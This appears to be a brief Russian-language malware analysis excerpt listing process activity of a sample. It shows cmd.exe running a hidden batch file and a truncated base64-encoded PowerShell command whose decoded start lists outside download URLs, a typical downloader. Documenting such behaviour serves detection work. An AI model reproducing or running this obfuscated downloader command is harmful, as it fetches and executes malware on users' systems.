Техническая информация
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\uwdhx.bat
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...